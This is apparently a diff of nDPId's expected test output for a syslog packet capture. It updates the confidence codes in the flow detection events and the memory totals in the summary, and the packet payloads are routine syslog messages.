+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":83,"source":"syslog.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1618744015613,"flow_last_seen":1618744046789,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":1244,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1618744314014,"l3_proto":"ip4","src_ip":"172.26.229.190","dst_ip":"172.23.80.196","src_port":514,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"syslog.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744358191,"flow_last_seen":1618744358191,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1618744358191,"l3_proto":"ip4","src_ip":"192.168.254.157","dst_ip":"196.240.66.148","src_port":49611,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"syslog.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1618744358191,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"thread_ts_msec":1618744358191,"pkt":"AAAAAAAAAAgA5occCABF4ACnOuMAAP4RubfAqP6dxPBClMHLAgIAk0yqPDEzND4gMjAyMS0wNC0xOCAxNToxMjozOCswNDowMCAxMC4xMjYuMjAuNjggTG9nLCAgICAgNjU5MzQsMC8zLzAvMCwyMjQuMi4yLjIzMSwxLDIwMjEtMDQtMTggMTM6MTI6MzgsMjAyMS0wNC0xOCAxNToxMjozOCxQUk9HUkFNLTEzMSwqLDExLA=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"syslog.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744358191,"flow_last_seen":1618744358191,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1618744358191,"l3_proto":"ip4","src_ip":"192.168.254.157","dst_ip":"196.240.66.148","src_port":49611,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"syslog.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744358191,"flow_last_seen":1618744358191,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1618744358191,"l3_proto":"ip4","src_ip":"192.168.254.157","dst_ip":"196.240.66.148","src_port":49611,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":84,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":84,"packets-processed":81,"total-skipped-flows":0,"total-l4-payload-len":10756,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":14,"total-detection-updates":0,"total-updates":2,"current-active-flows":2,"total-active-flows":16,"total-idle-flows":14,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":101,"global_ts_msec":1639052948178} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"syslog.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639052948178,"flow_last_seen":1639052948178,"flow_idle_time":200000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1639052948178,"l3_proto":"ip4","src_ip":"10.11.105.154","dst_ip":"10.6.15.11","src_port":20627,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"syslog.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1639052948178,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":761,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":761,"pkt_l4_len":671,"thread_ts_msec":1639052948178,"pkt":"AAAAAAAAAAQAAAAIgQABmAgARQACs1yXAAA\/EY\/tCgtpmgoGDwtQkwICAp+o6DwxODk+ZGF0ZT0yMDIxLTEyLTA5IHRpbWU9MTY6Mjk6MDYgZGV2bmFtZT0iQVRNRkxKUUFCSUwtVVQtODMiIGRldmlkPSJGR1Q2MUVUSzE5MDA5NDQ5IiBldmVudHRpbWU9MTYzOTA1Mjk0ODE1NDgzMTg4OSB0ej0iKzA0MDAiIGxvZ2lkPSIwMDAwMDAwMDEzIiB0eXBlPSJ0cmFmZmljIiBzdWJ0eXBlPSJmb3J3YXJkIiBsZXZlbD0ibm90aWNlIiB2ZD0icm9vdCIgc3JjaXA9MTAuMC4wLjEzIHNyY3BvcnQ9NTczODEgc3JjaW50Zj0iSFEtRkdUX0d3VjQtMSIgc3JjaW50ZnJvbGU9InVuZGVmaW5lZCIgZHN0aXA9MTAuMS4yNTEuNTEgZHN0cG9ydD04MDAwIGRzdGludGY9ImludGVybmFsIiBkc3RpbnRmcm9sZT0ibGFuIiBzcmNjb3VudHJ5PSJSZXNlcnZlZCIgZHN0Y291bnRyeT0iUmVzZXJ2ZWQiIHNlc3Npb25pZD03OTYwMjE2IHByb3RvPTYgYWN0aW9uPSJjbGllbnQtcnN0IiBwb2xpY3lpZD0yIHBvbGljeXR5cGU9InBvbGljeSIgcG9sdXVpZD0iMzUyMjgzMTYtYWY4Yy01MWVhLTMxYzItY2ZiNmUzYjc2M2NhIiBzZXJ2aWNlPSJUQ1AtODAwMCIgdHJhbmRpc3A9Im5vb3AiIGR1cmF0aW9uPTYgc2VudGJ5dGU9MjQ0IHJjdmRieXRlPTkwMCBzZW50cGt0PTUgdnBuPSJIUS1GR1RfR3dWNC0xIiB2cG50eXBlPSJpcHNlYy1zdGF0aWMiIGFwcGNhdD0idW5zY2FubmVkIhmBEQkBlwGXAWQCAQAAAAAAAAAAAAAAAAGXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMWukSU="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"syslog.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639052948178,"flow_last_seen":1639052948178,"flow_idle_time":200000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1639052948178,"l3_proto":"ip4","src_ip":"10.11.105.154","dst_ip":"10.6.15.11","src_port":20627,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":85,"source":"syslog.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1618744358191,"flow_last_seen":1618744358191,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1639052948178,"l3_proto":"ip4","src_ip":"192.168.254.157","dst_ip":"196.240.66.148","src_port":49611,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":85,"source":"syslog.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1618744117704,"flow_last_seen":1618744314014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1639052948178,"l3_proto":"ip4","src_ip":"10.186.117.194","dst_ip":"169.46.82.162","src_port":49948,"dst_port":52173,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"syslog.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639052948178,"flow_last_seen":1639052948178,"flow_idle_time":200000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1639052948178,"l3_proto":"ip4","src_ip":"10.11.105.154","dst_ip":"10.6.15.11","src_port":20627,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":85,"source":"syslog.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1618744358191,"flow_last_seen":1618744358191,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1639052948178,"l3_proto":"ip4","src_ip":"192.168.254.157","dst_ip":"196.240.66.148","src_port":49611,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":85,"source":"syslog.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1618744117704,"flow_last_seen":1618744314014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1639052948178,"l3_proto":"ip4","src_ip":"10.186.117.194","dst_ip":"169.46.82.162","src_port":49948,"dst_port":52173,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":85,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":85,"packets-processed":82,"total-skipped-flows":0,"total-l4-payload-len":11419,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":15,"total-detection-updates":0,"total-updates":2,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":107,"global_ts_msec":1646228387732} 00184{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":85,"source":"syslog.pcap","alias":"nDPId-test","layer_type":34916,"global_ts_msec":1646228387732} 00971{"packet_event_id":1,"packet_event_name":"packet","packet_id":85,"source":"syslog.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":525,"pkt_type":34916,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":525,"pkt_l4_len":0,"thread_ts_msec":1639052948178,"pkt":"JFpMlM8sAB0cD7o8iGQRAAABAfkAIUUAAfduywAAMxGwY8N4pYZT66ndAgIq+AHjFX48NDU+MSAyMDIyLTAzLTAyVDEyOjM5OjQ3LjY4OTM5Mi0wMTowMCBwZlNlbnNlLmxvY2FsZG9tYWluIHN1cmljYXRhIDM3MDQ2IC0gLSB7InRpbWVzdGFtcCI6ICIyMDIyLTAzLTAyVDEyOjM5OjQ3LjU2MTUyMy0wMTAwIiwgImZsb3dfaWQiOiAzODEwNzkzNTU4MjI1NzMsICJpbl9pZmFjZSI6ICJiZ2U5IiwgImV2ZW50X3R5cGUiOiAic3NoIiwgInNyY19pcCI6ICIxMDYuMTMuMjIzLjEiLCAic3JjX3BvcnQiOiA1MjUzMiwgImRlc3RfaXAiOiAiMTk1LjEyMC4xNjUuMTM0IiwgImRlc3RfcG9ydCI6IDIyMjIsICJwcm90byI6ICJUQ1AiLCAic3NoIjogeyJjbGllbnQiOiB7InByb3RvX3ZlcnNpb24iOiAiMi4wIiwgInNvZnR3YXJlX3ZlcnNpb24iOiAibGlic3NoLTAuNi4zIn0sICJzZXJ2ZXIiOiB7InByb3RvX3ZlcnNpb24iOiAiMi4wIiwgInNvZnR3YXJlX3ZlcnNpb24iOiAiT3BlblNTSF82LjdwMSBEZWJpYW4tNStkZWI4dTMifX19"} @@ -116,15 +116,15 @@ 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":89,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":89,"packets-processed":82,"total-skipped-flows":0,"total-l4-payload-len":11419,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":15,"total-detection-updates":0,"total-updates":2,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":116,"global_ts_msec":1646781267422} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"syslog.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646781267422,"flow_last_seen":1646781267422,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1646781267422,"l3_proto":"ip4","src_ip":"10.94.232.21","dst_ip":"10.94.150.21","src_port":57374,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"syslog.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1646781267422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":137,"pkt_l4_len":99,"thread_ts_msec":1646781267422,"pkt":"AAkPCQAVREyokzbXgQAH1QgARQAAd4NyQAA+ESYdCl7oFQpelhXgHgICAGMIejw2Pk1hciAgOSAwNDo0NDoyNyBOREMzQ0xORE1WQTIyIGtlcm5lbDogSVB2NjogQUREUkNPTkYoTkVUREVWX1VQKTogZXRoMDogbGluayBpcyBub3QgcmVhZHk="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"syslog.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646781267422,"flow_last_seen":1646781267422,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1646781267422,"l3_proto":"ip4","src_ip":"10.94.232.21","dst_ip":"10.94.150.21","src_port":57374,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"syslog.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646781267422,"flow_last_seen":1646781267422,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1646781267422,"l3_proto":"ip4","src_ip":"10.94.232.21","dst_ip":"10.94.150.21","src_port":57374,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"syslog.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1646781267424,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":142,"pkt_l4_len":104,"thread_ts_msec":1646781267424,"pkt":"AAkPCQAVREyokzbXgQAH1QgARQAAfIN0QAA+ESYWCl7oFQpelhXgHgICAGj66Tw2Pk1hciAgOSAwNDo0NDoyNyBOREMzQ0xORE1WQTIyIGtlcm5lbDogSVB2NjogQUREUkNPTkYoTkVUREVWX0NIQU5HRSk6IGV0aDA6IGxpbmsgYmVjb21lcyByZWFkeQ=="} 00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"syslog.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1646781267424,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":149,"pkt_l4_len":111,"thread_ts_msec":1646781267424,"pkt":"AAkPCQAVREyokzbXgQAH1QgARQAAg4N1QAA+ESYOCl7oFQpelhXgHgICAG\/wdjw2Pk1hciAgOSAwNDo0NDoyNyBOREMzQ0xORE1WQTIyIGtlcm5lbDogSVB2NjogQUREUkNPTkYoTkVUREVWX0NIQU5HRSk6IHZldGhhNWZhMTNmOiBsaW5rIGJlY29tZXMgcmVhZHk="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646781268509,"flow_last_seen":1646781268509,"flow_idle_time":200000,"flow_min_l4_payload_len":1270,"flow_max_l4_payload_len":1270,"flow_tot_l4_payload_len":1270,"flow_avg_l4_payload_len":1270,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.94.80.60","dst_ip":"10.94.150.22","src_port":39438,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02138{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1646781268509,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1316,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1316,"pkt_l4_len":1278,"thread_ts_msec":1646781268509,"pkt":"AAkPCQAVREyokzbXgQAH1QgARQAFEpBvQAA+EaxdCl5QPApelhaaDgICBP4qVzwzMD5NYXIgIDkgMDQ6NDQ6MjggbmRjM2x2bXNkcHRkMiBmaWxlYmVhdDogMjAyMi0wMy0wOVQwNDo0NDoyOC41MDIrMDUzMCMwMTFJTkZPIzAxMVttb25pdG9yaW5nXSMwMTFsb2cvbG9nLmdvOjE0NSMwMTFOb24temVybyBtZXRyaWNzIGluIHRoZSBsYXN0IDMwcyMwMTF7Im1vbml0b3JpbmciOiB7Im1ldHJpY3MiOiB7ImJlYXQiOnsiY3B1Ijp7InN5c3RlbSI6eyJ0aWNrcyI6MzQyNzY1MCwidGltZSI6eyJtcyI6M319LCJ0b3RhbCI6eyJ0aWNrcyI6NjA2MDIxMCwidGltZSI6eyJtcyI6OH0sInZhbHVlIjo2MDYwMjEwfSwidXNlciI6eyJ0aWNrcyI6MjYzMjU2MCwidGltZSI6eyJtcyI6NX19fSwiaGFuZGxlcyI6eyJsaW1pdCI6eyJoYXJkIjo0MDk2LCJzb2Z0IjoxMDI0fSwib3BlbiI6MTB9LCJpbmZvIjp7ImVwaGVtZXJhbF9pZCI6ImI0MDc3MDU1LTNlZmUtNDk4Yi04ZDUwLWQ5MTZmMWYzMTllYSIsInVwdGltZSI6eyJtcyI6ODkyNzYxMjYxM319LCJtZW1zdGF0cyI6eyJnY19uZXh0IjoyNTIwNDQ0OCwibWVtb3J5X2FsbG9jIjoxNjQzMjM5MiwibWVtb3J5X3RvdGFsIjo0NzA1MTM5NDgyNDh9LCJydW50aW1lIjp7Imdvcm91dGluZXMiOjM0fX0sImZpbGViZWF0Ijp7ImV2ZW50cyI6eyJhZGRlZCI6MiwiZG9uZSI6Mn0sImhhcnZlc3RlciI6eyJmaWxlcyI6eyJhYmY2ZWIzOC02NGFjLTRjY2UtOWQyNy1hZjlmNjg0MzAwYmIiOnsibGFzdF9ldmVudF9wdWJsaXNoZWRfdGltZSI6IjIwMjItMDMtMDlUMDQ6NDM6NTkuNTQ0WiIsImxhc3RfZXZlbnRfdGltZXN0YW1wIjoiMjAyMi0wMy0wOVQwNDo0Mzo1OS41NDRaIiwicmVhZF9vZmZzZXQiOjI1MzIsInNpemUiOjI1MzJ9fSwib3Blbl9maWxlcyI6MiwicnVubmluZyI6Mn19LCJsaWJiZWF0Ijp7ImNvbmZpZyI6eyJtb2R1bGUiOnsicnVubmluZyI6MH19LCJvdXRwdXQiOnsiZXZlbnRzIjp7ImFja2VkIjoyLCJiYXRjaGVzIjoxLCJ0b3RhbCI6Mn0sInJlYWQiOnsiYnl0ZXMiOjEyfSwid3JpdGUiOnsiYnl0ZXMiOjEyMzR9fSwicGlwZWxpbmUiOnsiY2xpZW50cyI6MSwiZXZlbnRzIjp7ImFjdGl2ZSI6MCwicHVibGlzaGVkIjoyLCJ0b3RhbCI6Mn0sInF1ZXVlIjp7ImFja2VkIjoyfX19LCJyZWdpc3RyYXIiOnsic3RhdGVzIjp7ImN1cnJlbnQiOjMsInVwZGF0ZSI6Mn0sIndyaXRlcyI6eyJzdWNjZXNzIjoxLCJ0b3RhbCI6MX19LCJzeXN0ZW0iOnsibG9hZCI6eyIxIjowLCIxNSI6MC4wNSwiNSI6MC4wMSwibm9ybSI6eyIxIjowLCIxNSI6MC4wMTI1LCI1IjowLjAwMjV9fX19fX0="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646781268509,"flow_last_seen":1646781268509,"flow_idle_time":200000,"flow_min_l4_payload_len":1270,"flow_max_l4_payload_len":1270,"flow_tot_l4_payload_len":1270,"flow_avg_l4_payload_len":1270,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.94.80.60","dst_ip":"10.94.150.22","src_port":39438,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1646781268509,"flow_last_seen":1646781268509,"flow_idle_time":200000,"flow_min_l4_payload_len":1270,"flow_max_l4_payload_len":1270,"flow_tot_l4_payload_len":1270,"flow_avg_l4_payload_len":1270,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.94.80.60","dst_ip":"10.94.150.22","src_port":39438,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1639052948178,"flow_last_seen":1639052948178,"flow_idle_time":200000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.11.105.154","dst_ip":"10.6.15.11","src_port":20627,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1646781267422,"flow_last_seen":1646781267427,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.94.232.21","dst_ip":"10.94.150.21","src_port":57374,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646781268509,"flow_last_seen":1646781268509,"flow_idle_time":200000,"flow_min_l4_payload_len":1270,"flow_max_l4_payload_len":1270,"flow_tot_l4_payload_len":1270,"flow_avg_l4_payload_len":1270,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.94.80.60","dst_ip":"10.94.150.22","src_port":39438,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1646781268509,"flow_last_seen":1646781268509,"flow_idle_time":200000,"flow_min_l4_payload_len":1270,"flow_max_l4_payload_len":1270,"flow_tot_l4_payload_len":1270,"flow_avg_l4_payload_len":1270,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.94.80.60","dst_ip":"10.94.150.22","src_port":39438,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1639052948178,"flow_last_seen":1639052948178,"flow_idle_time":200000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.11.105.154","dst_ip":"10.6.15.11","src_port":20627,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1646781267422,"flow_last_seen":1646781267427,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1646781268509,"l3_proto":"ip4","src_ip":"10.94.232.21","dst_ip":"10.94.150.21","src_port":57374,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":94,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":94,"packets-processed":88,"total-skipped-flows":0,"total-l4-payload-len":13199,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":17,"total-detection-updates":0,"total-updates":2,"current-active-flows":0,"total-active-flows":19,"total-idle-flows":19,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":128,"global_ts_msec":1646781268509} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 94/88 @@ -134,9 +134,9 @@ ~~ total active/idle flows...: 19/19 ~~ total timeout flows.......: 2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5893319 bytes -~~ total memory freed........: 5893319 bytes -~~ total allocations/frees...: 118282/118282 +~~ total memory allocated....: 6026953 bytes +~~ total memory freed........: 6026953 bytes +~~ total allocations/frees...: 121044/121044 